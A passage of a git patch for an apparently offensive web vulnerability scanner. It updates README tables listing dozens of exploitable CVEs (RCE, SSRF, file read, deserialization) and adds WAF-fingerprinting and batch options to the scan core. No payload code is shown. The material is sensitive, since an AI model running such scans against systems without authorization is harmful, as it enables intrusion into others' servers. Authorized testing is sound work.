From ba309df74b5ac935b0bea2115ececfb20dd489c4 Mon Sep 17 00:00:00 2001
From: CLincat <3132002932@qq.com>
Date: Thu, 16 Jun 2022 14:34:46 +0800
Subject: [PATCH] 20220616-v1.0.9
---
README.md | 155 +++++++------
README_en-us.md | 156 +++++++------
lib/core/coreScan.py | 62 ++++-
lib/initial/config.py | 2 +-
lib/initial/language.py | 38 +++-
lib/initial/list.py | 163 +++++++++-----
lib/initial/parse.py | 8 +-
lib/tool/check.py | 2 +-
lib/tool/fingerprint.py | 182 ++++++++++++++-
lib/tool/head.py | 16 ++
lib/tool/logger.py | 1 +
payloads/AtlassianConfluence.py | 386 ++++++++++++++++++++++++++++++++
payloads/Django.py | 3 +-
payloads/ElasticSearch.py | 369 ++++++++++++++++++++++++++++++
payloads/F5BIGIP.py | 13 +-
payloads/Fastjson.py | 2 +-
payloads/Spring.py | 12 +-
payloads/ThinkPHP.py | 91 +++++++-
payloads/demo2.py | 134 +++++++++++
19 files changed, 1572 insertions(+), 223 deletions(-)
create mode 100644 lib/tool/head.py
create mode 100644 payloads/AtlassianConfluence.py
create mode 100644 payloads/ElasticSearch.py
create mode 100644 payloads/demo2.py
diff --git a/README.md b/README.md
index 2b7948f..6413e71 100644
--- a/README.md
+++ b/README.md
@@ -6,76 +6,87 @@
* 如果有什么想法、建议或者遇到了BUG, 都可以issues
**目前支持扫描的web应用程序有:**
-> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, Cicso, Django, F5-BIG-IP, Fastjson, Keycloak, Spring, ThinkPHP, Ueditor, Weblogic, Yonyou
+> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Django, ElasticSearch, F5-BIG-IP, Fastjson, Keycloak, Spring, ThinkPHP, Ueditor, Weblogic, Yonyou
目前支持扫描的web漏洞有: [点击展开]
```
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Target | Vul_id | Type | Method | Description |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| AlibabaDruid | None | unAuth | GET | 阿里巴巴Druid未授权访问 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| AlibabaNacos | CVE-2021-29441 | unAuth | GET/POST | 阿里巴巴Nacos未授权访问 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheAirflow | CVE-2020-17526 | unAuth | GET | Airflow身份验证绕过 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheAPISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX默认密钥 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheFlink | CVE-2020-17519 | FileRead | GET | Flink目录遍历 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheSolr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/任意文件读取 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheStruts2 | S2-001 | RCE | POST | Struts2远程代码执行 |
-| ApacheStruts2 | S2-005 | RCE | GET | Struts2远程代码执行 |
-| ApacheStruts2 | S2-007 | RCE | GET | Struts2远程代码执行 |
-| ApacheStruts2 | S2-008 | RCE | GET | Struts2远程代码执行 |
-| ApacheStruts2 | S2-009 | RCE | GET | Struts2远程代码执行 |
-| ApacheStruts2 | S2-012 | RCE | GET | Struts2远程代码执行 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheTomcat | CVE-2017-12615 | FileUpload | PUT | PUT方法任意文件写入 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb身份认证绕过 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Cisco | CVE-2020-3580 | XSS | POST | 思科ASA/FTD XSS跨站脚本攻击 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS跨站脚本攻击 |
-| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQL注入 |
-| Django | CVE-2018-14574 | Redirect | GET | CommonMiddleware url重定向 |
-| Django | CVE-2020-9402 | SQLinject | GET | GIS SQL注入 |
-| Django | CVE-2021-35042 | SQLinject | GET | QuerySet.order_by SQL注入 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| F5-BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP远程代码执行 |
-| F5-BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP身份认证绕过 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Fastjson | CNVD-2019-22238 | unSerialize| POST | Fastjson <=1.2.47 反序列化 |
-| Fastjson | CVE-2017-18349 | unSerialize| POST | Fastjson <= 1.2.24 反序列化 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Keycloak | CVE-2020-10770 | SSRF | GET | 使用request_uri调用未经验证的URL |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework远程代码执行 |
-| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot目录遍历 |
-| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud目录遍历 |
-| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL远程代码执行 |
-| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl远程代码执行 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ThinkPHP | CNVD-2018-24942 | RCE | GET | 未开启强制路由导致RCE |
-| ThinkPHP | CNNVD-201901-445 | RCE | POST | 核心类Request远程代码执行 |
-| ThinkPHP | None | RCE | GET | ThinkPHP2.x 远程代码执行 |
-| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids参数SQL注入 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Ueditor | None | SSRF | GET | Ueditor编辑器SSRF |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Weblogic | CVE-2020-14882 | RCE | GET | Weblogic未授权命令执行 |
-| Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic权限验证绕过 |
-| Weblogic | CVE-2019-2725 | unSerialize| POST | Weblogic wls9_async反序列化 |
-| Weblogic | CVE-2017-10271 | unSerialize| POST | Weblogic XMLDecoder反序列化 |
-| Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic 服务端请求伪造 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Yonyou | CNVD-2021-30167 | RCE | GET | 用友NC BeanShell远程命令执行 |
-| Yonyou | None | FileRead | GET | 用友ERP-NC NCFindWeb目录遍历 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Target | Vul_id | Type | Method | Description |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Alibaba Druid | None | unAuth | GET | 阿里巴巴Druid未授权访问 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Alibaba Nacos | CVE-2021-29441 | unAuth | GET/POST | 阿里巴巴Nacos未授权访问 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Airflow | CVE-2020-17526 | unAuth | GET | Airflow身份验证绕过 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache APISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX默认密钥 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Flink | CVE-2020-17519 | FileRead | GET | Flink目录遍历 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Solr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/任意文件读取 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Struts2 | S2-001 | RCE | POST | Struts2远程代码执行 |
+| Apache Struts2 | S2-005 | RCE | GET | Struts2远程代码执行 |
+| Apache Struts2 | S2-007 | RCE | GET | Struts2远程代码执行 |
+| Apache Struts2 | S2-008 | RCE | GET | Struts2远程代码执行 |
+| Apache Struts2 | S2-009 | RCE | GET | Struts2远程代码执行 |
+| Apache Struts2 | S2-012 | RCE | GET | Struts2远程代码执行 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT | PUT方法任意文件写入 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb身份认证绕过 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Atlassian Confluence | CVE-2015-8399 | FileRead | GET | Confluence任意文件包含 |
+| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | POST | Confluence路径遍历和命令执行 |
+| Atlassian Confluence | CVE-2021-26084 | RCE | POST | Confluence Webwork Pre-Auth OGNL表达式命令注入 |
+| Atlassian Confluence | CVE-2022-26134 | RCE | GET | Confluence远程代码执行 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Cisco | CVE-2020-3580 | XSS | POST | 思科ASA/FTD XSS跨站脚本攻击 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS跨站脚本攻击 |
+| Django | CVE-2018-14574 | Redirect | GET | CommonMiddleware url重定向 |
+| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQL注入 |
+| Django | CVE-2020-9402 | SQLinject | GET | GIS SQL注入 |
+| Django | CVE-2021-35042 | SQLinject | GET | QuerySet.order_by SQL注入 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| ElasticSearch | CVE-2014-3120 | RCE | POST | ElasticSearch命令执行 |
+| ElasticSearch | CVE-2015-1427 | RCE | POST | ElasticSearch Groovy 沙盒绕过&&代码执行 |
+| ElasticSearch | CVE-2015-3337 | FileRead | GET | ElasticSearch 目录穿越 |
+| ElasticSearch | CVE-2015-5531 | FileRead | PUT/GET | ElasticSearch 目录穿越 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| F5 BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP远程代码执行 |
+| F5 BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP身份认证绕过 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Fastjson | CNVD-2017-02833 | unSerialize | POST | Fastjson <= 1.2.24 反序列化 |
+| Fastjson | CNVD-2019-22238 | unSerialize | POST | Fastjson <=1.2.47 反序列化 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Keycloak | CVE-2020-10770 | SSRF | GET | 使用request_uri调用未经验证的URL |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud目录遍历 |
+| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot目录遍历 |
+| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl远程代码执行 |
+| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL远程代码执行 |
+| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework远程代码执行 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| ThinkPHP | CVE-2018-1002015 | RCE | GET | ThinkPHP5.x 远程代码执行 |
+| ThinkPHP | CNVD-2018-24942 | RCE | GET | 未开启强制路由导致RCE |
+| ThinkPHP | CNNVD-201901-445 | RCE | POST | 核心类Request远程代码执行 |
+| ThinkPHP | None | RCE | GET | ThinkPHP2.x 远程代码执行 |
+| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids参数SQL注入 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Ueditor | None | SSRF | GET | Ueditor编辑器SSRF |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Oracle Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic 服务端请求伪造 |
+| Oracle Weblogic | CVE-2017-10271 | unSerialize | POST | Weblogic XMLDecoder反序列化 |
+| Oracle Weblogic | CVE-2019-2725 | unSerialize | POST | Weblogic wls9_async反序列化 |
+| Oracle Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic权限验证绕过 |
+| Oracle Weblogic | CVE-2020-14882 | RCE | GET | Weblogic未授权命令执行 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Yonyou | CNVD-2021-30167 | RCE | GET | 用友NC BeanShell远程命令执行 |
+| Yonyou | None | FileRead | GET | 用友ERP-NC NCFindWeb目录遍历 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
```
@@ -133,7 +144,7 @@ Options:
http/https代理 (如: --http-proxy 127.0.0.1:8080)
--user-agent=UA 自定义User-Agent
--cookie=COOKIE 添加cookie
- --log=LOG 日志等级, 可选1-5 (默认: 1) [日志2级: 框架名称+漏洞编号+状态码] [日志3级:
+ --log=LOG 日志等级, 可选1-6 (默认: 1) [日志2级: 框架名称+漏洞编号+状态码] [日志3级:
2级内容+请求方法+请求目标+POST数据] [日志4级: 2级内容+请求数据包] [日志5级:
4级内容+响应头] [日志6级: 5级内容+响应内容]
@@ -160,15 +171,21 @@ Options:
以json格式保存扫描结果, 无漏洞时不会生成文件(如: --output-text
result.json)
+ General:
+ 通用工作参数
+
+ --no-waf 禁用waf检测
+ --batch yes/no的选项不需要用户输入, 使用默认选项
+
Lists:
漏洞列表
--list 查看所有Payload
支持的目标类型(-a参数, 不区分大小写):
- AliDruid,airflow,apisix,appweb,cisco,django,f5bigip,fastjson,flink,key
- cloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyo
- u
+ AliDruid,airflow,apisix,appweb,cisco,confluence,django,elasticsearch,f
+ 5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,strut
+ s2,ueditor,weblogic,yonyou
```
## language
diff --git a/README_en-us.md b/README_en-us.md
index 8889c56..52c2edc 100644
--- a/README_en-us.md
+++ b/README_en-us.md
@@ -5,76 +5,87 @@
* If you have any ideas, suggestions, or bugs, you can issue
**Web applications that currently support scanning:**
-> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, Cicso, Django, F5-BIG-IP, Fastjson, Keycloak, Spring, ThinkPHP, Ueditor, Weblogic, Yonyou
+> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Django, ElasticSearch, F5-BIG-IP, Fastjson, Keycloak, Spring, ThinkPHP, Ueditor, Weblogic, Yonyou
The current web vulnerabilities that support scanning: [Click on]
```
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Target | Vul_id | Type | Method | Description |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| AlibabaDruid | None | unAuth | GET | Alibaba Druid unAuthorized |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| AlibabaNacos | CVE-2021-29441 | unAuth | GET/POST | Alibaba Nacos unAuthorized |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheAirflow | CVE-2020-17526 | unAuth | GET | Airflow Authentication bypass |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheAPISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX default access token |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheFlink | CVE-2020-17519 | FileRead | GET | Flink Directory traversal |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheSolr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/FileRead |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheStruts2 | S2-001 | RCE | POST | Struts2 Remote code execution |
-| ApacheStruts2 | S2-005 | RCE | GET | Struts2 Remote code execution |
-| ApacheStruts2 | S2-007 | RCE | GET | Struts2 Remote code execution |
-| ApacheStruts2 | S2-008 | RCE | GET | Struts2 Remote code execution |
-| ApacheStruts2 | S2-009 | RCE | GET | Struts2 Remote code execution |
-| ApacheStruts2 | S2-012 | RCE | GET | Struts2 Remote code execution |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheTomcat | CVE-2017-12615 | FileUpload | PUT | Put method writes to any file |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb Authentication bypass |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Cisco | CVE-2020-3580 | XSS | POST | Cisco ASA/FTD XSS |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS |
-| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQLinject |
-| Django | CVE-2018-14574 | Redirect | GET | Django CommonMiddleware URL Redirect |
-| Django | CVE-2020-9402 | SQLinject | GET | Django GIS SQLinject |
-| Django | CVE-2021-35042 | SQLinject | GET | Django QuerySet.order_by SQLinject |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| F5-BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP Remote code execution |
-| F5-BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP Authentication bypass |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Fastjson | CNVD-2019-22238 | unSerialize| POST | Fastjson <=1.2.47 deSerialization |
-| Fastjson | CVE-2017-18349 | unSerialize| POST | Fastjson <= 1.2.24 deSerialization |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Keycloak | CVE-2020-10770 | SSRF | GET | request_uri SSRF |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework Remote code execution |
-| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot Directory traversal |
-| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud Directory traversal |
-| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL Remote code execution |
-| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl Remote code execution |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ThinkPHP | CNVD-2018-24942 | RCE | GET | The forced route is not enabled Remote code execution |
-| ThinkPHP | CNNVD-201901-445 | RCE | POST | Core class Request Remote code execution |
-| ThinkPHP | None | RCE | GET | ThinkPHP2.x Remote code execution |
-| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids SQLinject |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Ueditor | None | SSRF | GET | Ueditor SSRF |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Weblogic | CVE-2020-14882 | RCE | GET | Weblogic Unauthorized command execution |
-| Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic Authentication bypass |
-| Weblogic | CVE-2019-2725 | unSerialize| POST | Weblogic wls9_async deSerialization |
-| Weblogic | CVE-2017-10271 | unSerialize| POST | Weblogic XMLDecoder deSerialization |
-| Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic SSRF |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Yonyou | CNVD-2021-30167 | RCE | GET | Yonyou-NC BeanShell Remote code execution |
-| Yonyou | None | FileRead | GET | Yonyou-ERP-NC NCFindWeb Directory traversal |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Target | Vul_id | Type | Method | Description |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Alibaba Druid | None | unAuth | GET | Alibaba Druid unAuthorized |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Alibaba Nacos | CVE-2021-29441 | unAuth | GET/POST | Alibaba Nacos unAuthorized |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Airflow | CVE-2020-17526 | unAuth | GET | Airflow Authentication bypass |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache APISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX default access token |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Flink | CVE-2020-17519 | FileRead | GET | Flink Directory traversal |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Solr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/FileRead |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Struts2 | S2-001 | RCE | POST | Struts2 Remote code execution |
+| Apache Struts2 | S2-005 | RCE | GET | Struts2 Remote code execution |
+| Apache Struts2 | S2-007 | RCE | GET | Struts2 Remote code execution |
+| Apache Struts2 | S2-008 | RCE | GET | Struts2 Remote code execution |
+| Apache Struts2 | S2-009 | RCE | GET | Struts2 Remote code execution |
+| Apache Struts2 | S2-012 | RCE | GET | Struts2 Remote code execution |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT | Put method writes to any file |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb Authentication bypass |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Atlassian Confluence | CVE-2015-8399 | FileRead | GET | Confluence any file include |
+| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | POST | Confluence Directory traversal && RCE |
+| Atlassian Confluence | CVE-2021-26084 | RCE | POST | Confluence OGNL expression command injection |
+| Atlassian Confluence | CVE-2022-26134 | RCE | GET | Confluence Remote code execution |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Cisco | CVE-2020-3580 | XSS | POST | Cisco ASA/FTD XSS |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS |
+| Django | CVE-2018-14574 | Redirect | GET | Django CommonMiddleware URL Redirect |
+| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQLinject |
+| Django | CVE-2020-9402 | SQLinject | GET | Django GIS SQLinject |
+| Django | CVE-2021-35042 | SQLinject | GET | Django QuerySet.order_by SQLinject |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| ElasticSearch | CVE-2014-3120 | RCE | POST | ElasticSearch Remote code execution |
+| ElasticSearch | CVE-2015-1427 | RCE | POST | ElasticSearch Groovy Sandbox to bypass && RCE |
+| ElasticSearch | CVE-2015-3337 | FileRead | GET | ElasticSearch Directory traversal |
+| ElasticSearch | CVE-2015-5531 | FileRead | PUT/GET | ElasticSearch Directory traversal |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| F5 BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP Remote code execution |
+| F5 BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP Authentication bypass |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Fastjson | CNVD-2017-02833 | unSerialize | POST | Fastjson <= 1.2.24 deSerialization |
+| Fastjson | CNVD-2019-22238 | unSerialize | POST | Fastjson <=1.2.47 deSerialization |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Keycloak | CVE-2020-10770 | SSRF | GET | request_uri SSRF |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud Directory traversal |
+| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot Directory traversal |
+| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl Remote code execution |
+| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL Remote code execution |
+| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework Remote code execution |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| ThinkPHP | CVE-2018-1002015 | RCE | GET | ThinkPHP5.x Remote code execution |
+| ThinkPHP | CNVD-2018-24942 | RCE | GET | The forced route is not enabled Remote code execution |
+| ThinkPHP | CNNVD-201901-445 | RCE | POST | Core class Request Remote code execution |
+| ThinkPHP | None | RCE | GET | ThinkPHP2.x Remote code execution |
+| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids SQLinject |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Ueditor | None | SSRF | GET | Ueditor SSRF |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Oracle Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic SSRF |
+| Oracle Weblogic | CVE-2017-10271 | unSerialize | POST | Weblogic XMLDecoder deSerialization |
+| Oracle Weblogic | CVE-2019-2725 | unSerialize | POST | Weblogic wls9_async deSerialization |
+| Oracle Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic Authentication bypass |
+| Oracle Weblogic | CVE-2020-14882 | RCE | GET | Weblogic Unauthorized command execution |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Yonyou | CNVD-2021-30167 | RCE | GET | Yonyou-NC BeanShell Remote code execution |
+| Yonyou | None | FileRead | GET | Yonyou-ERP-NC NCFindWeb Directory traversal |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
```
@@ -133,7 +144,7 @@ Options:
127.0.0.1:8080)
--user-agent=UA Customize the User-Agent
--cookie=COOKIE Add a cookie
- --log=LOG The log level, Optional 1-5 (default: 1) [level 2:
+ --log=LOG The log level, Optional 1-6 (default: 1) [level 2:
Framework name + Vulnerability number + status code]
[level 3: Level 2 content + request method + request
target +POST data] [level 4: Level 2 content + request
@@ -167,15 +178,22 @@ Options:
will not generate files(e.g. --output-text
result.json)
+ General:
+ General operating parameter
+
+ --no-waf Disable WAF detection
+ --batch The yes/no option does not require user input. The
+ default option is used
+
Lists:
Vulnerability list
--list View all payload
Supported target types(Case insensitive):
- AliDruid,airflow,apisix,appweb,cisco,django,f5bigip,fastjson,flink,key
- cloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyo
- u
+ AliDruid,airflow,apisix,appweb,cisco,confluence,django,elasticsearch,f
+ 5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,strut
+ s2,ueditor,weblogic,yonyou
```
## language
diff --git a/lib/core/coreScan.py b/lib/core/coreScan.py
index 76909d0..be4f048 100644
--- a/lib/core/coreScan.py
+++ b/lib/core/coreScan.py
@@ -7,6 +7,7 @@
from lib.tool.logger import logger
from lib.tool import check
from lib.report import output
+from lib.tool.fingerprint import identify
from payloads.AlibabaDruid import alidruid
from payloads.AlibabaNacos import nacos
from payloads.ApacheAirflow import airflow
@@ -16,8 +17,10 @@
from payloads.ApacheTomcat import tomcat
from payloads.ApacheStruts2 import struts2
from payloads.AppWeb import appweb
+from payloads.AtlassianConfluence import confluence
from payloads.Cisco import cisco
from payloads.Django import django
+from payloads.ElasticSearch import elasticsearch
from payloads.F5BIGIP import f5bigip
from payloads.Fastjson import fastjson
from payloads.ThinkPHP import thinkphp
@@ -38,6 +41,9 @@ def __init__(self):
self.delay = config.get('delay') # * 延时
self.url_list = config.get('url_list') # * url列表
self.app_list = config.get('app_list') # * 框架列表
+ self.batch = config.get('batch')
+ self.no_waf = config.get('no_waf') # * 是否启用WAF指纹识别
+ # self.web_app = config.get('web_app') # * 是否启用框架指纹识别
self.thread_list = [] # * 已经运行的线程列表
self.results = [] # * 结果列表
self.queue = Queue() # * 创建线程池
@@ -48,8 +54,37 @@ def __init__(self):
def start(self):
''' 开始扫描, 添加poc并启动 '''
- for u in self.url_list: # * 遍历urls
- logger.info('yellow_ex', self.lang['core']['start']['start'] + u) # ? 提示, 开始扫描当前url
+ for u in self.url_list: # * 遍历urls
+ logger.info('yellow_ex', self.lang['core']['start']['start'] + u) # ? 提示, 开始扫描当前url
+
+ # * --------------------WAF指纹识别--------------------
+ if (not self.no_waf):
+ waf_info = identify.waf_identify(u) # * WAF指纹识别
+ if waf_info:
+ while True:
+ if (not self.batch): # * 是否使用默认选项
+ logger.info('red', '', print_end='')
+ operation = input(self.lang['core']['start']['waf_find'].format(waf_info)) # * 接收参数
+ else:
+ logger.info('red', self.lang['core']['start']['waf_find'].format(waf_info), print_end='')
+ operation = 'no' # * 默认选项No
+ logger.info('red', 'no', notime=True)
+
+ operation = operation.lower() # * 字母转小写
+ if operation in ['y', 'yes']: # * 继续扫描
+ logger.info('yellow_ex', self.lang['core']['stop']['continue']) # ? 日志, 继续扫描
+ break
+ elif operation in ['n', 'no']:
+ logger.info('yellow_ex', self.lang['core']['stop']['next']) # ? 日志, 下一个
+ u = 'next'
+ break
+ else:
+ logger.info('yellow_ex', self.lang['core']['start']['waf_not_find'])
+
+ if u == 'next':
+ continue
+ # * --------------------WAF指纹识别--------------------
+
if check.check_connect(u):
self.addPOC(u) # * 为url添加poc 并加入线程池
self.scanning() # * 开始扫描该url
@@ -75,6 +110,7 @@ def addPOC(self, url):
logger.info('reset', '', notime=True, print_end='') # * 重置文字颜色
_exit(0)
+
def scanning(self):
''' 正在扫描, 根据线程数启动poc '''
queue_thread = int(self.queue.qsize() / self.thread)+1 # * 循环次数
@@ -93,24 +129,36 @@ def scanning(self):
except KeyboardInterrupt:
if self.stop():
continue
+ else:
+ self.queue.queue.clear() # * 清空当前url的扫描队列
+ break # * 停止当前url的扫描, 并扫描下一个url
+
+
def stop(self):
''' # ! 功能还没写好
Ctrl+C暂停扫描
q(uit) 退出扫描
c(ontinue) 继续扫描
+ n(ext) 跳过当前url的扫描
m(odify) (还没写好)修改参数, 输入参数名和值(如-t 3)然后回车, 修改相应参数, 并继续扫描
wq(save and exit) 等待已经运行的poc, 保存并输出已有的漏洞结果, 有--output参数的话则同步保存至文件
'''
while True:
- logger.info('reset', '[CTRL+C] q(uit)/c(ontinue)/wq(save and exit): ') # ? 提示信息
